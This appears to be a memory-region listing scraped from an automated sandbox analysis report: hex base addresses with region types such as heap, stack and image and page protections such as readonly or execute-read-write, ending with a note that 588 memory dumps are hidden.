page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
C40000
|
unkown
|
page readonly
|
||
1CDBC000
|
unkown
|
page read and write
|
||
35E3000
|
unkown
|
page read and write
|
||
2350000
|
unkown
|
page read and write
|
||
27EE000
|
unkown
|
page read and write
|
||
17C000
|
stack
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
500000
|
unkown
|
page readonly
|
||
1D0000
|
heap private
|
page read and write
|
||
C0000
|
unkown
|
page readonly
|
||
B34000
|
heap private
|
page read and write
|
||
29C000
|
stack
|
page read and write
|
||
227000
|
heap default
|
page read and write
|
||
1BD0000
|
unkown
|
page read and write
|
||
1E0000
|
heap private
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
507000
|
heap default
|
page read and write
|
||
9A0000
|
heap private
|
page read and write
|
||
4F0000
|
unkown
|
page readonly
|
||
2B5A000
|
unkown
|
page read and write
|
||
7FF00180000
|
unkown
|
page execute and read and write
|
||
532000
|
heap private
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1DC000
|
unkown
|
page read and write
|
||
5B7000
|
heap default
|
page read and write
|
||
2AD0000
|
heap private
|
page read and write
|
||
1CE39000
|
unkown
|
page read and write
|
||
2CD6000
|
unkown
|
page read and write
|
||
2B80000
|
heap private
|
page read and write
|
||
358B000
|
unkown
|
page read and write
|
||
3D3000
|
unkown
|
page execute and read and write
|
||
1ACA0000
|
unkown
|
page read and write
|
||
22D000
|
heap default
|
page read and write
|
||
1BA60000
|
heap private
|
page read and write
|
||
537000
|
heap default
|
page read and write
|
||
160000
|
unkown
|
page read and write
|
||
550000
|
heap default
|
page read and write
|
||
7FF001A0000
|
unkown
|
page read and write
|
||
32F000
|
stack
|
page read and write
|
||
3A0000
|
unkown
|
page readonly
|
||
1CDBF000
|
unkown
|
page read and write
|
||
36E000
|
heap default
|
page read and write
|
||
7FF00042000
|
unkown
|
page execute and read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
1CD42000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
B7C000
|
unkown
|
page read and write
|
||
2040000
|
unkown
|
page readonly
|
||
9FF000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
2EDF000
|
unkown
|
page read and write
|
||
7FF001C0000
|
unkown
|
page read and write
|
||
2100000
|
heap private
|
page read and write
|
||
7FF00230000
|
unkown
|
page read and write
|
||
600000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2227000
|
unkown
|
page readonly
|
||
2CA1000
|
unkown
|
page read and write
|
||
3D1000
|
unkown
|
page execute and read and write
|
||
780000
|
unkown
|
page readonly
|
||
3B92000
|
unkown
|
page read and write
|
||
9A4000
|
heap private
|
page read and write
|
||
1DC0000
|
unkown
|
page readonly
|
||
1CAF3000
|
heap private
|
page read and write
|
||
243000
|
unkown
|
page execute and read and write
|
||
9ED000
|
unkown
|
page read and write
|
||
1C06000
|
unkown
|
page read and write
|
||
1CE38000
|
unkown
|
page read and write
|
||
1CDB7000
|
unkown
|
page read and write
|
||
35E6000
|
unkown
|
page read and write
|
||
190000
|
unkown
|
page execute and read and write
|
||
203000
|
unkown
|
page execute and read and write
|
||
1CD42000
|
unkown
|
page read and write
|
||
EB000
|
unkown
|
page read and write
|
||
35D0000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
5B0000
|
heap default
|
page read and write
|
||
15A000
|
stack
|
page read and write
|
||
272D000
|
unkown
|
page read and write
|
||
2B60000
|
unkown
|
page readonly
|
||
426000
|
unkown
|
page read and write
|
||
9B0000
|
heap private
|
page read and write
|
||
D4000
|
heap private
|
page read and write
|
||
272B000
|
unkown
|
page readonly
|
||
2B87000
|
heap private
|
page read and write
|
||
1CDC9000
|
unkown
|
page read and write
|
||
35AA000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
1CDAB000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
271000
|
unkown
|
page execute and read and write
|
||
1B0000
|
unkown
|
page read and write
|
||
364C000
|
unkown
|
page read and write
|
||
30FE000
|
stack
|
page read and write
|
||
4BE000
|
unkown
|
page read and write
|
||
1CD54000
|
unkown
|
page read and write
|
||
7FF00170000
|
unkown
|
page read and write
|
||
1C9DD000
|
unkown
|
page read and write
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
32E000
|
heap default
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
2187000
|
unkown
|
page readonly
|
||
3D0000
|
unkown
|
page readonly
|
||
12CCC000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
1BC29000
|
heap private
|
page read and write
|
||
1BC4000
|
heap private
|
page read and write
|
||
811000
|
heap default
|
page read and write
|
||
7FF00100000
|
unkown
|
page read and write
|
||
280000
|
unkown
|
page readonly
|
||
663000
|
unkown
|
page read and write
|
||
7FF00240000
|
unkown
|
page execute and read and write
|
||
1F60000
|
unkown
|
page readonly
|
||
450000
|
unkown
|
page readonly
|
||
1AD00000
|
unkown
|
page read and write
|
||
2D04000
|
unkown
|
page read and write
|
||
1CD21000
|
unkown
|
page read and write
|
||
890000
|
heap default
|
page read and write
|
||
648000
|
unkown
|
page read and write
|
||
1F7000
|
heap default
|
page read and write
|
||
7FF00220000
|
unkown
|
page execute and read and write
|
||
3C1C000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
4CE000
|
unkown
|
page read and write
|
||
36C4000
|
unkown
|
page read and write
|
||
223000
|
unkown
|
page execute and read and write
|
||
291D000
|
unkown
|
page read and write
|
||
7FF0003A000
|
unkown
|
page execute and read and write
|
||
320000
|
heap default
|
page read and write
|
||
1D50000
|
unkown
|
page readonly
|
||
7FF001B0000
|
unkown
|
page execute and read and write
|
||
537000
|
heap default
|
page read and write
|
||
1CC000
|
unkown
|
page read and write
|
||
11B000
|
unkown
|
page read and write
|
||
650000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page readonly
|
||
100000
|
unkown
|
page readonly
|
||
1B60000
|
unkown
|
page write copy
|
||
2DA000
|
stack
|
page read and write
|
||
7FF00190000
|
unkown
|
page execute and read and write
|
||
1E00000
|
unkown
|
page read and write
|
||
59E000
|
stack
|
page read and write
|
||
260000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
190000
|
heap private
|
page read and write
|
||
635000
|
unkown
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
2950000
|
unkown
|
page read and write
|
||
2700000
|
unkown
|
page readonly
|
||
1B870000
|
unkown
|
page write copy
|
||
2650000
|
unkown
|
page read and write
|
||
64A000
|
unkown
|
page read and write
|
||
1CD51000
|
unkown
|
page read and write
|
||
B30000
|
heap private
|
page read and write
|
||
35CD000
|
unkown
|
page read and write
|
||
340000
|
heap private
|
page read and write
|
||
624000
|
heap private
|
page read and write
|
||
A0000
|
heap default
|
page read and write
|
||
1BC0B000
|
unkown
|
page read and write
|
||
8F0000
|
heap private
|
page read and write
|
||
12DB1000
|
unkown
|
page read and write
|
||
53D000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
21B000
|
unkown
|
page read and write
|
||
1FA7000
|
unkown
|
page readonly
|
||
1D4D000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page write copy
|
||
1D0F7000
|
unkown
|
page readonly
|
||
26B0000
|
unkown
|
page read and write
|
||
260000
|
unkown
|
page read and write
|
||
1BC0000
|
unkown
|
page readonly
|
||
8B4000
|
heap default
|
page read and write
|
||
53D000
|
heap default
|
page read and write
|
||
1CDB2000
|
unkown
|
page read and write
|
||
1D0000
|
unkown
|
page read and write
|
||
35A4000
|
unkown
|
page read and write
|
||
270000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
35D3000
|
unkown
|
page read and write
|
||
420000
|
unkown
|
page readonly
|
||
2954000
|
unkown
|
page read and write
|
||
730000
|
unkown
|
page read and write
|
||
2D80000
|
unkown
|
page write copy
|
||
34B5000
|
unkown
|
page read and write
|
||
3E4000
|
heap default
|
page read and write
|
||
2147000
|
unkown
|
page readonly
|
||
5A7000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
12CA1000
|
unkown
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
65D000
|
unkown
|
page read and write
|
||
380000
|
heap default
|
page read and write
|
||
240000
|
heap default
|
page read and write
|
||
1CF10000
|
unkown
|
page readonly
|
||
2360000
|
heap private
|
page read and write
|
||
819000
|
heap default
|
page read and write
|
||
330000
|
heap default
|
page read and write
|
||
1CD51000
|
unkown
|
page read and write
|
||
34DE000
|
unkown
|
page read and write
|
||
23A0000
|
unkown
|
page readonly
|
||
612000
|
unkown
|
page read and write
|
||
2E0000
|
unkown
|
page readonly
|
||
9C2000
|
heap private
|
page read and write
|
||
35A1000
|
unkown
|
page read and write
|
||
3F9000
|
heap default
|
page read and write
|
||
270C000
|
unkown
|
page readonly
|
||
1D90000
|
unkown
|
page readonly
|
||
273000
|
unkown
|
page execute and read and write
|
||
1CD54000
|
unkown
|
page read and write
|
||
221000
|
unkown
|
page execute and read and write
|
||
12F52000
|
unkown
|
page read and write
|
||
241000
|
unkown
|
page execute and read and write
|
||
35C0000
|
unkown
|
page read and write
|
||
2707000
|
unkown
|
page readonly
|
||
1DA7000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
7CD000
|
heap default
|
page read and write
|
||
3BDD000
|
unkown
|
page read and write
|
||
2F32000
|
unkown
|
page read and write
|
||
5D4000
|
heap default
|
page read and write
|
||
2970000
|
heap private
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
630000
|
unkown
|
page readonly
|
||
5B0000
|
unkown
|
page readonly
|
||
1CD3C000
|
unkown
|
page read and write
|
||
7FF001F0000
|
unkown
|
page execute and read and write
|
||
7FF00280000
|
unkown
|
page read and write
|
||
500000
|
heap default
|
page read and write
|
||
507000
|
heap default
|
page read and write
|
||
A30000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
2A26000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
647000
|
unkown
|
page read and write
|
||
1E8000
|
heap private
|
page read and write
|
||
214000
|
heap default
|
page read and write
|
||
63D000
|
unkown
|
page read and write
|
||
1CDA7000
|
unkown
|
page read and write
|
||
2420000
|
unkown
|
page readonly
|
||
2A0000
|
heap private
|
page read and write
|
||
35B7000
|
unkown
|
page read and write
|
||
797000
|
heap default
|
page read and write
|
||
78E000
|
unkown
|
page read and write
|
||
337000
|
heap default
|
page read and write
|
||
360000
|
unkown
|
page readonly
|
||
206000
|
unkown
|
page read and write
|
||
8CD000
|
heap default
|
page read and write
|
||
90000
|
unkown
|
page read and write
|
||
2D0000
|
unkown
|
page readonly
|
||
10021000
|
unkown
|
page execute and read and write
|
||
64A000
|
unkown
|
page read and write
|
||
217000
|
heap default
|
page read and write
|
||
7C7000
|
heap default
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
63E000
|
heap default
|
page read and write
|
||
642000
|
unkown
|
page read and write
|
||
2890000
|
unkown
|
page read and write
|
||
2007000
|
unkown
|
page readonly
|
||
180000
|
unkown
|
page readonly
|
||
524000
|
heap default
|
page read and write
|
||
210000
|
heap default
|
page read and write
|
||
D0000
|
unkown
|
page read and write
|
||
C30000
|
heap private
|
page read and write
|
||
9E0000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
65D000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page write copy
|
||
7FF00290000
|
unkown
|
page execute and read and write
|
||
584000
|
heap default
|
page read and write
|
||
288F000
|
unkown
|
page read and write
|
||
420000
|
unkown
|
page readonly
|
||
3000000
|
heap private
|
page read and write
|
||
7FF00270000
|
unkown
|
page execute and read and write
|
||
1CA8E000
|
unkown
|
page read and write
|
||
651000
|
unkown
|
page read and write
|
||
110000
|
unkown
|
page read and write
|
||
897000
|
heap default
|
page read and write
|
||
3010000
|
unkown
|
page readonly
|
||
2800000
|
unkown
|
page readonly
|
||
400000
|
unkown
|
page readonly
|
||
100000
|
unkown
|
page read and write
|
||
1CDB7000
|
unkown
|
page read and write
|
||
2B70000
|
unkown
|
page read and write
|
||
1CD38000
|
unkown
|
page read and write
|
||
3AAE000
|
unkown
|
page read and write
|
||
B2F000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
3C3D000
|
unkown
|
page read and write
|
||
2B70000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page read and write
|
||
16C000
|
unkown
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
2F0000
|
unkown
|
page readonly
|
||
B0000
|
heap private
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
12CA5000
|
unkown
|
page read and write
|
||
1B535000
|
unkown
|
page read and write
|
||
3267000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
60000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
3529000
|
unkown
|
page read and write
|
||
3560000
|
heap private
|
page read and write
|
||
1BC0000
|
heap private
|
page read and write
|
||
7B4000
|
heap default
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
1B556000
|
unkown
|
page read and write
|
||
1B521000
|
unkown
|
page read and write
|
||
27B000
|
unkown
|
page read and write
|
||
2D90000
|
heap private
|
page read and write
|
||
7E0000
|
heap default
|
page read and write
|
||
410000
|
unkown
|
page readonly
|
||
1CDD2000
|
unkown
|
page read and write
|
||
7FF0010A000
|
unkown
|
page execute and read and write
|
||
A0F000
|
unkown
|
page read and write
|
||
624000
|
unkown
|
page read and write
|
||
1F77000
|
unkown
|
page readonly
|
||
360000
|
unkown
|
page execute and read and write
|
||
26AF000
|
stack
|
page read and write
|
||
1B51D000
|
unkown
|
page read and write
|
||
65D000
|
unkown
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
260000
|
heap default
|
page read and write
|
||
26B0000
|
unkown
|
page readonly
|
||
290000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
A14000
|
unkown
|
page read and write
|
||
7FF00200000
|
unkown
|
page read and write
|
||
670000
|
unkown
|
page readonly
|
||
10021000
|
unkown
|
page execute and read and write
|
||
3261000
|
unkown
|
page read and write
|
||
2B70000
|
unkown
|
page read and write
|
||
27BF000
|
unkown
|
page read and write
|
||
29F0000
|
unkown
|
page read and write
|
||
1BC5F000
|
heap private
|
page read and write
|
||
550000
|
unkown
|
page readonly
|
||
7FF002A0000
|
unkown
|
page execute and read and write
|
||
2380000
|
unkown
|
page readonly
|
||
96E000
|
stack
|
page read and write
|
||
1CE38000
|
unkown
|
page read and write
|
||
770000
|
heap private
|
page read and write
|
||
1D65000
|
heap private
|
page read and write
|
||
AC0000
|
heap private
|
page read and write
|
||
234D000
|
stack
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1C78E000
|
unkown
|
page read and write
|
||
297A000
|
heap private
|
page execute and read and write
|
||
5A2000
|
heap default
|
page read and write
|
||
9D0000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page readonly
|
||
1D2F0000
|
unkown
|
page readonly
|
||
1B370000
|
unkown
|
page read and write
|
||
3F0000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
2FAE000
|
stack
|
page read and write
|
||
7FF002B0000
|
unkown
|
page execute and read and write
|
||
1CD10000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
BC000
|
unkown
|
page read and write
|
||
1FA0000
|
unkown
|
page readonly
|
||
26B0000
|
unkown
|
page read and write
|
||
B90000
|
heap private
|
page read and write
|
||
5B0000
|
heap default
|
page read and write
|
||
7FF001D0000
|
unkown
|
page execute and read and write
|
||
110000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
3D0000
|
heap private
|
page read and write
|
||
190000
|
unkown
|
page execute and read and write
|
||
211000
|
unkown
|
page execute and read and write
|
||
1CDB3000
|
unkown
|
page read and write
|
||
2ABE000
|
unkown
|
page read and write
|
||
600000
|
unkown
|
page readonly
|
||
1D2F000
|
unkown
|
page read and write
|
||
29B0000
|
heap private
|
page execute and read and write
|
||
790000
|
heap default
|
page read and write
|
||
2B55000
|
unkown
|
page read and write
|
||
2240000
|
unkown
|
page readonly
|
||
12EF0000
|
unkown
|
page read and write
|
||
3661000
|
unkown
|
page read and write
|
||
2C9E000
|
unkown
|
page read and write | page guard
|
||
26B0000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
2C2C000
|
unkown
|
page read and write
|
||
1CD52000
|
unkown
|
page read and write
|
||
430000
|
unkown
|
page readonly
|
||
2849000
|
heap private
|
page read and write
|
||
2B70000
|
unkown
|
page readonly
|
||
270E000
|
stack
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
250000
|
heap private
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
7FF00132000
|
unkown
|
page execute and read and write
|
||
460000
|
unkown
|
page readonly
|
||
370000
|
unkown
|
page readonly
|
||
600000
|
unkown
|
page readonly
|
||
3C6E000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
510000
|
heap private
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
2D7E000
|
stack
|
page read and write
|
||
27F0000
|
unkown
|
page readonly
|
||
1C8AE000
|
unkown
|
page read and write
|
||
8E0000
|
heap default
|
page read and write
|
||
1D6AC000
|
unkown
|
page read and write
|
||
26C0000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
7FF00040000
|
unkown
|
page read and write
|
||
2C5C000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
651000
|
unkown
|
page read and write
|
||
2B84000
|
heap private
|
page read and write
|
||
635000
|
heap default
|
page read and write
|
||
1A6000
|
unkown
|
page read and write
|
||
56D000
|
heap default
|
page read and write
|
||
35E9000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page read and write
|
||
1A5000
|
unkown
|
page read and write | page guard
|
||
35EC000
|
unkown
|
page read and write
|
||
780000
|
unkown
|
page readonly
|
||
1CC90000
|
heap private
|
page read and write
|
||
7FF0004C000
|
unkown
|
page execute and read and write
|
||
3E0000
|
heap private
|
page read and write
|
||
35D6000
|
unkown
|
page read and write
|
||
347000
|
heap private
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
130000
|
unkown
|
page readonly
|
||
B52000
|
heap private
|
page read and write
|
||
1E90000
|
unkown
|
page readonly
|
||
170000
|
heap private
|
page read and write
|
||
357B000
|
unkown
|
page read and write
|
||
5D0000
|
unkown
|
page readonly
|
||
843000
|
heap default
|
page read and write
|
||
2340000
|
unkown
|
page readonly
|
||
1B552000
|
unkown
|
page read and write
|
||
1CDBA000
|
unkown
|
page read and write
|
||
1B930000
|
unkown
|
page read and write
|
||
2B50000
|
unkown
|
page read and write
|
||
2C60000
|
unkown
|
page write copy
|
||
2C90000
|
heap private
|
page read and write
|
||
295A000
|
unkown
|
page read and write
|
||
64F000
|
unkown
|
page read and write
|
||
1A0000
|
heap default
|
page read and write
|
||
1CDBA000
|
unkown
|
page read and write
|
||
2760000
|
unkown
|
page readonly
|
||
32D000
|
unkown
|
page read and write
|
||
3DF000
|
heap default
|
page read and write
|
||
2170000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
325B000
|
unkown
|
page read and write
|
||
640000
|
unkown
|
page read and write
|
||
2E1D000
|
unkown
|
page read and write
|
||
2840000
|
unkown
|
page readonly
|
||
2200000
|
unkown
|
page read and write
|
||
3E9000
|
heap default
|
page read and write
|
||
1C82E000
|
unkown
|
page read and write
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
1E10000
|
heap private
|
page execute and read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
2A0000
|
unkown
|
page readonly
|
||
283D000
|
stack
|
page read and write
|
||
35BD000
|
unkown
|
page read and write
|
||
2B40000
|
unkown
|
page readonly
|
||
640000
|
unkown
|
page read and write
|
||
27EF000
|
unkown
|
page read and write
|
||
2867000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2CAE000
|
stack
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
100000
|
unkown
|
page read and write
|
||
7FF001E0000
|
unkown
|
page read and write
|
||
550000
|
heap default
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
1B505000
|
unkown
|
page read and write
|
||
647000
|
unkown
|
page read and write
|
||
500000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
1E6000
|
unkown
|
page read and write
|
||
58E000
|
unkown
|
page read and write
|
||
57F000
|
heap default
|
page read and write
|
||
1B565000
|
unkown
|
page read and write
|
||
2840000
|
heap private
|
page read and write
|
||
7FF00207000
|
unkown
|
page read and write
|
||
1CAE0000
|
heap private
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
20000
|
heap private
|
page read and write
|
||
662000
|
unkown
|
page read and write
|
||
2E80000
|
heap private
|
page read and write
|
||
24E000
|
heap default
|
page read and write
|
||
201000
|
unkown
|
page execute and read and write
|
||
1BC20000
|
heap private
|
page read and write
|
||
3BD8000
|
unkown
|
page read and write
|
||
2750000
|
unkown
|
page readonly
|
||
26B0000
|
unkown
|
page read and write
|
||
3B1000
|
heap default
|
page read and write
|
||
283C000
|
unkown
|
page read and write
|
||
35BA000
|
unkown
|
page read and write
|
||
213000
|
unkown
|
page execute and read and write
|
||
274E000
|
unkown
|
page read and write
|
||
2D2E000
|
unkown
|
page read and write
|
||
620000
|
heap private
|
page read and write
|
||
BCE000
|
unkown
|
page read and write
|
||
26F0000
|
unkown
|
page readonly
|
||
7FF000F0000
|
unkown
|
page read and write
|
||
415000
|
heap default
|
page read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
7FF00210000
|
unkown
|
page read and write
|
||
4FE000
|
unkown
|
page read and write
|
||
7FF000F2000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
90000
|
unkown
|
page read and write
|
||
7FF0026A000
|
unkown
|
page execute and read and write
|
||
5A0000
|
unkown
|
page readonly
|
||
8C7000
|
heap default
|
page read and write
|
||
7FF00032000
|
unkown
|
page execute and read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
6B0000
|
unkown
|
page readonly
|
||
2E7E000
|
unkown
|
page read and write
|
||
2DAE000
|
stack
|
page read and write
|
||
2C9F000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
1CDA7000
|
unkown
|
page read and write
|
||
1B480000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
7FF00105000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
26B0000
|
unkown
|
page read and write
|
||
1D9B000
|
heap private
|
page read and write
|
||
E0000
|
unkown
|
page readonly
|
||
29ED000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
290000
|
unkown
|
page read and write
|
||
12E11000
|
unkown
|
page read and write
|
||
D0000
|
heap private
|
page read and write
|
||
360000
|
heap private
|
page read and write
|
||
5ED000
|
heap default
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
1E20000
|
unkown
|
page readonly
|
||
35A7000
|
unkown
|
page read and write
|
||
B50000
|
heap private
|
page read and write
|
||
3E4000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
626000
|
unkown
|
page read and write
|
||
2360000
|
unkown
|
page readonly
|
||
514000
|
heap private
|
page read and write
|
||
7FF00260000
|
unkown
|
page execute and read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
1CDB7000
|
unkown
|
page read and write
|
||
26AF000
|
unkown
|
page read and write
|
||
630000
|
heap default
|
page read and write
|
||
28FD000
|
unkown
|
page read and write
|
||
278C000
|
unkown
|
page read and write
|
||
1CDF6000
|
unkown
|
page read and write
|
||
1D60000
|
heap private
|
page read and write
|
||
1F70000
|
unkown
|
page readonly
|
||
26B0000
|
unkown
|
page read and write
|
||
1AC000
|
stack
|
page read and write
|
||
2AF0000
|
unkown
|
page readonly
|
||
364000
|
heap default
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
F0000
|
unkown
|
page readonly
|
||
EC000
|
unkown
|
page read and write
|
||
198000
|
heap private
|
page read and write
|
||
450000
|
unkown
|
page readonly
|
||
33ED000
|
unkown
|
page read and write
|
||
5E7000
|
heap default
|
page read and write
|
||
1F0000
|
heap default
|
page read and write
|
||
1F2000
|
unkown
|
page read and write
|
||
524000
|
heap default
|
page read and write
|
||
3A0000
|
heap private
|
page read and write
|
||
1CDA8000
|
unkown
|
page read and write
|
||
390000
|
heap private
|
page read and write
|
||
1B540000
|
unkown
|
page read and write
|
There are 588 hidden memdumps, click here to show them.